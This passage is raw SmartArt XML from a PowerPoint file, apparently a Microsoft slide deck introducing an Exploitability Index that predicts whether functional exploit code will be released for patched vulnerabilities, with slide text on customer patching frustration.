    <dgm:cxn modelId="{9D5E6EB3-F533-4E7A-A9F1-1AF6BC957EAC}" srcId="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" destId="{AC0C6B82-9677-46D1-9D2D-BA9ADEA30C0C}" srcOrd="2" destOrd="0" parTransId="{7A1FB069-AA70-4F7F-9750-6B56B3F3CCC5}" sibTransId="{C3C0BFFC-7C02-4CB0-AB55-49E836DAF8CE}"/>
    <dgm:cxn modelId="{E33B5DCA-5DD9-42A0-881E-1BAB829E8140}" type="presOf" srcId="{41F060B7-F5D3-4EF6-A8DD-5F04A3010E3E}" destId="{08473F64-EE6B-4269-A956-9482A39605D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{86F9C86C-5E80-4D8E-A89E-FF9AECB788A2}" type="presOf" srcId="{1E2252A9-67E2-4586-AF2B-AF0D912FD202}" destId="{9FBAB0AD-9980-4A9F-8C5C-DA90A72A03D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{4DC0AB10-783A-40E7-A241-2D298C28B3B2}" type="presOf" srcId="{13678C14-7175-4BE4-A985-F20D04395340}" destId="{024649F1-E745-42A3-AE56-9F83F5DB48F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{BBEBD1FB-91CD-48EB-A87F-128C5F004B6D}" type="presOf" srcId="{41F060B7-F5D3-4EF6-A8DD-5F04A3010E3E}" destId="{F8E43E76-BBA1-478E-84E7-410EE35EB74D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8501D0BA-CCB3-464E-BAED-CCC718A57BC8}" srcId="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" destId="{1E2252A9-67E2-4586-AF2B-AF0D912FD202}" srcOrd="1" destOrd="0" parTransId="{CC96D1EC-494E-42F9-8D9B-AF1E428E2E4A}" sibTransId="{13678C14-7175-4BE4-A985-F20D04395340}"/>
    <dgm:cxn modelId="{63D68E4D-EA0A-4DD1-A5F0-83664AEDD2AF}" srcId="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" destId="{41F060B7-F5D3-4EF6-A8DD-5F04A3010E3E}" srcOrd="0" destOrd="0" parTransId="{B7AC9DC3-C99A-4AC1-B85A-040B85350835}" sibTransId="{F4F2901F-6005-48FA-9649-B0CC3798BE4D}"/>
    <dgm:cxn modelId="{9E75C4E7-5BC1-4987-862F-CCAC0666C5C0}" type="presOf" srcId="{1E2252A9-67E2-4586-AF2B-AF0D912FD202}" destId="{0848AD43-A3C8-46DD-BE06-E90202A9CFCC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F22CC7C6-CAD6-4130-9D22-95438A659586}" type="presOf" srcId="{AC0C6B82-9677-46D1-9D2D-BA9ADEA30C0C}" destId="{9158B13C-A161-4070-8419-7D5C79EED834}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9BA67DF5-04C0-4616-9E53-4817CAF8CFE7}" type="presOf" srcId="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" destId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{42B22ECA-D2F2-4DF2-AD9C-9AEAC530A959}" type="presOf" srcId="{AC0C6B82-9677-46D1-9D2D-BA9ADEA30C0C}" destId="{3728BD06-6146-4D4A-80E3-9464341FEE8F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{797D8388-FC3F-4F07-B8C8-936EFAEE77EE}" type="presOf" srcId="{F4F2901F-6005-48FA-9649-B0CC3798BE4D}" destId="{F9E61853-94AF-4042-A55C-45E3E69CDD16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{C73072B4-23D6-4209-95E4-526C7FA3A160}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{FC0B44DC-E5AC-4BEA-8C9E-41F06EF4014E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{C5E6C551-EF7D-4A0B-836B-07F8BEF9DE09}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{08473F64-EE6B-4269-A956-9482A39605D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{71E220B2-1111-4E29-8B22-BAAA321B8D6B}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{9FBAB0AD-9980-4A9F-8C5C-DA90A72A03D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{FD4F24E8-4A78-4F6B-B39A-1E6376076421}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{3728BD06-6146-4D4A-80E3-9464341FEE8F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1FD044B0-F7A3-4807-B850-69660FFB434E}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{F9E61853-94AF-4042-A55C-45E3E69CDD16}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F9546698-ED68-4E56-BCF0-C5C18E868A37}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{024649F1-E745-42A3-AE56-9F83F5DB48F2}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{C8990C92-00FD-4B36-B792-501E484C69C9}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{F8E43E76-BBA1-478E-84E7-410EE35EB74D}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E0AF8315-F1D5-45BC-9A5A-ADED9D117F10}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{0848AD43-A3C8-46DD-BE06-E90202A9CFCC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{83612B3B-8298-4888-A966-2761F4FA5C7C}" type="presParOf" srcId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" destId="{9158B13C-A161-4070-8419-7D5C79EED834}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data3.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{A51B4E4B-0590-4984-9318-25BDBA8776AA}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/radial4" loCatId="relationship" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_1" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>GOAL: Prediction of the likelihood that functional exploit code will be released</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68BD18B0-019C-4B7B-A803-84C8756BCB7C}" type="parTrans" cxnId="{96AE01C7-9BCD-439F-A2E6-2B2CDA7093E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2D21E49-0BF5-4EC9-B064-62B658E07C03}" type="sibTrans" cxnId="{96AE01C7-9BCD-439F-A2E6-2B2CDA7093E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E750670F-C789-4FDF-9A94-F4EDDA7DD2CA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>“Is there exploit code available?”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" b="1" u="sng" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
            <a:t>Through webcasts, calls, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
            <a:t>CxO</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
            <a:t> conferences, and email forums, we get this question every release without fail.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E83371EA-2B3C-46F0-9721-358F6E551ABF}" type="parTrans" cxnId="{97FB07BA-9606-4817-80E7-D7F3B041E1BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7546D4EB-1BEB-4D94-91FD-23057B927302}" type="sibTrans" cxnId="{97FB07BA-9606-4817-80E7-D7F3B041E1BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0390DA6-BC8E-441A-986F-BF7E24E4B7AE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" u="none" dirty="0" smtClean="0"/>
            <a:t>Customer  Pain</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>“Patching” drains resources, frustrates IT &amp; does not give confidence in the security of Microsoft products. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" i="1" dirty="0" smtClean="0"/>
            <a:t>IT Pros</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" b="1" i="1" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" i="1" dirty="0" smtClean="0"/>
            <a:t>are frustrated w/many patches &amp; updates they deal with as a result of ‘insecure/unreliable products’.  As a result, time, company resources, energy , and effort is required to install and test patches.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" b="1" i="1" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E047A7-FE4D-48E1-B8C5-1CA4F7A64662}" type="parTrans" cxnId="{2713E198-488D-4DCD-91DC-98437AAEE6E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30DA657D-7256-49FF-AA3E-5614AB28FA65}" type="sibTrans" cxnId="{2713E198-488D-4DCD-91DC-98437AAEE6E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37D69BAE-631A-43E1-91D2-D4585AAD38BC}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>Reality</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
            <a:t>: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
            <a:t>While we answer this question in the bulletins today, it frequently changes within the first two weeks (sometimes two hours) after release.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97B7C318-3A32-4303-B0B3-2C1C24AB38DF}" type="parTrans" cxnId="{D897EDDE-683E-4206-95E5-B6B1C5379B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F702E09-B022-4C58-A51A-B664AEE259D0}" type="sibTrans" cxnId="{D897EDDE-683E-4206-95E5-B6B1C5379B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" type="pres">
      <dgm:prSet presAssocID="{A51B4E4B-0590-4984-9318-25BDBA8776AA}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:animLvl val="ctr"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB6B4DF2-3A46-4190-9E15-6FC625F76EE9}" type="pres">
      <dgm:prSet presAssocID="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" presName="centerShape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1" custScaleX="113563" custScaleY="56105" custLinFactNeighborX="-373" custLinFactNeighborY="-20278"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FDDAC5A-6D25-4E3D-B605-61279A59A193}" type="pres">
      <dgm:prSet presAssocID="{E83371EA-2B3C-46F0-9721-358F6E551ABF}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EEA922E-B800-483C-8E56-AD0939E7253E}" type="pres">
      <dgm:prSet presAssocID="{E750670F-C789-4FDF-9A94-F4EDDA7DD2CA}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="72312" custScaleY="100120" custRadScaleRad="120533" custRadScaleInc="9284">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FD46621-AD64-4911-98D3-90B416D75FD7}" type="pres">
      <dgm:prSet presAssocID="{09E047A7-FE4D-48E1-B8C5-1CA4F7A64662}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="1" presStyleCnt="3" custLinFactNeighborX="-265" custLinFactNeighborY="11151"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{217E9945-592F-4F61-B024-7CD8168F11C3}" type="pres">
      <dgm:prSet presAssocID="{F0390DA6-BC8E-441A-986F-BF7E24E4B7AE}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="167083" custScaleY="112586" custRadScaleRad="106464" custRadScaleInc="300">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40C28C8A-C164-4346-9E2B-170D30766072}" type="pres">
      <dgm:prSet presAssocID="{97B7C318-3A32-4303-B0B3-2C1C24AB38DF}" presName="parTrans" presStyleLbl="bgSibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3EDE5FE-3FF0-42E8-A43C-45A3546C8C89}" type="pres">
      <dgm:prSet presAssocID="{37D69BAE-631A-43E1-91D2-D4585AAD38BC}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="73556" custScaleY="99687" custRadScaleRad="120225" custRadScaleInc="-8998">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{9EBC41C4-9AE8-4D13-9CF0-754331B91C3D}" type="presOf" srcId="{E83371EA-2B3C-46F0-9721-358F6E551ABF}" destId="{3FDDAC5A-6D25-4E3D-B605-61279A59A193}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{E66E76F7-5D42-4739-97A0-C3CADD86CAE3}" type="presOf" srcId="{F0390DA6-BC8E-441A-986F-BF7E24E4B7AE}" destId="{217E9945-592F-4F61-B024-7CD8168F11C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{2713E198-488D-4DCD-91DC-98437AAEE6E2}" srcId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" destId="{F0390DA6-BC8E-441A-986F-BF7E24E4B7AE}" srcOrd="1" destOrd="0" parTransId="{09E047A7-FE4D-48E1-B8C5-1CA4F7A64662}" sibTransId="{30DA657D-7256-49FF-AA3E-5614AB28FA65}"/>
    <dgm:cxn modelId="{D897EDDE-683E-4206-95E5-B6B1C5379B87}" srcId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" destId="{37D69BAE-631A-43E1-91D2-D4585AAD38BC}" srcOrd="2" destOrd="0" parTransId="{97B7C318-3A32-4303-B0B3-2C1C24AB38DF}" sibTransId="{4F702E09-B022-4C58-A51A-B664AEE259D0}"/>
    <dgm:cxn modelId="{97FB07BA-9606-4817-80E7-D7F3B041E1BD}" srcId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" destId="{E750670F-C789-4FDF-9A94-F4EDDA7DD2CA}" srcOrd="0" destOrd="0" parTransId="{E83371EA-2B3C-46F0-9721-358F6E551ABF}" sibTransId="{7546D4EB-1BEB-4D94-91FD-23057B927302}"/>
    <dgm:cxn modelId="{E52D7F23-9FA4-4FF4-BC1F-D32C95C59356}" type="presOf" srcId="{97B7C318-3A32-4303-B0B3-2C1C24AB38DF}" destId="{40C28C8A-C164-4346-9E2B-170D30766072}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{4D0DF72A-65AC-40F6-A4C1-B72FC317424D}" type="presOf" srcId="{A51B4E4B-0590-4984-9318-25BDBA8776AA}" destId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{FFA7E407-CBCD-4CBB-BE38-9ECB475C3C94}" type="presOf" srcId="{09E047A7-FE4D-48E1-B8C5-1CA4F7A64662}" destId="{3FD46621-AD64-4911-98D3-90B416D75FD7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{CF690B34-3B24-4AE3-BAB1-B45197CA3142}" type="presOf" srcId="{E750670F-C789-4FDF-9A94-F4EDDA7DD2CA}" destId="{2EEA922E-B800-483C-8E56-AD0939E7253E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{BE84B524-CB25-449B-8F3E-78FA8FCEED67}" type="presOf" srcId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" destId="{AB6B4DF2-3A46-4190-9E15-6FC625F76EE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{87C91BBD-7052-4DC1-8609-2C61005CEF6E}" type="presOf" srcId="{37D69BAE-631A-43E1-91D2-D4585AAD38BC}" destId="{E3EDE5FE-3FF0-42E8-A43C-45A3546C8C89}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{96AE01C7-9BCD-439F-A2E6-2B2CDA7093E3}" srcId="{A51B4E4B-0590-4984-9318-25BDBA8776AA}" destId="{97F41FC9-D6C2-405F-B85B-D6EE7F314325}" srcOrd="0" destOrd="0" parTransId="{68BD18B0-019C-4B7B-A803-84C8756BCB7C}" sibTransId="{F2D21E49-0BF5-4EC9-B064-62B658E07C03}"/>
    <dgm:cxn modelId="{ECC67A1A-5482-48E9-94E0-522941659CE4}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{AB6B4DF2-3A46-4190-9E15-6FC625F76EE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A2E535D0-2EB6-45C8-9810-5793FD20D45C}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{3FDDAC5A-6D25-4E3D-B605-61279A59A193}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{39DA08C0-082E-430F-BF1E-AC3D1F246031}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{2EEA922E-B800-483C-8E56-AD0939E7253E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{54963F1A-C8ED-48C6-96DD-04406E417777}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{3FD46621-AD64-4911-98D3-90B416D75FD7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{644B3036-BD61-455C-AA17-D83B738CE998}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{217E9945-592F-4F61-B024-7CD8168F11C3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A258F620-9E1D-465F-9B6B-9B11B19E0567}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{40C28C8A-C164-4346-9E2B-170D30766072}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{E8D36F99-3472-4559-8F77-E4FE784D8986}" type="presParOf" srcId="{33A4B209-58E6-4AD6-8837-58D2522D6068}" destId="{E3EDE5FE-3FF0-42E8-A43C-45A3546C8C89}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
  </dgm:cxnLst>
  <dgm:bg>
    <a:noFill/>
  </dgm:bg>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data4.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d2" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful1" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{686B00F9-0D00-4B32-BFFF-B0B37A8FFF39}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Exploitability Index</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFBE95B6-7E29-4FCB-8B51-563E40584BA2}" type="parTrans" cxnId="{33EA2B00-8824-48D5-A9E8-74359304D5C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B083171C-D8EC-4C95-B7B6-1CEA2D576ED4}" type="sibTrans" cxnId="{33EA2B00-8824-48D5-A9E8-74359304D5C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28627677-DDB6-4A28-A6D6-D77B65BDA065}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Evaluate exploitability of the vulnerabilities using industry methodology and MAPP partners</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10D1D66F-05EE-4168-80A4-9AEFD6F3439D}" type="parTrans" cxnId="{75729B91-E906-4D23-80F8-62A1E1199D2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96EB227C-AF5D-42FE-90B6-350A644F8C1F}" type="sibTrans" cxnId="{75729B91-E906-4D23-80F8-62A1E1199D2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
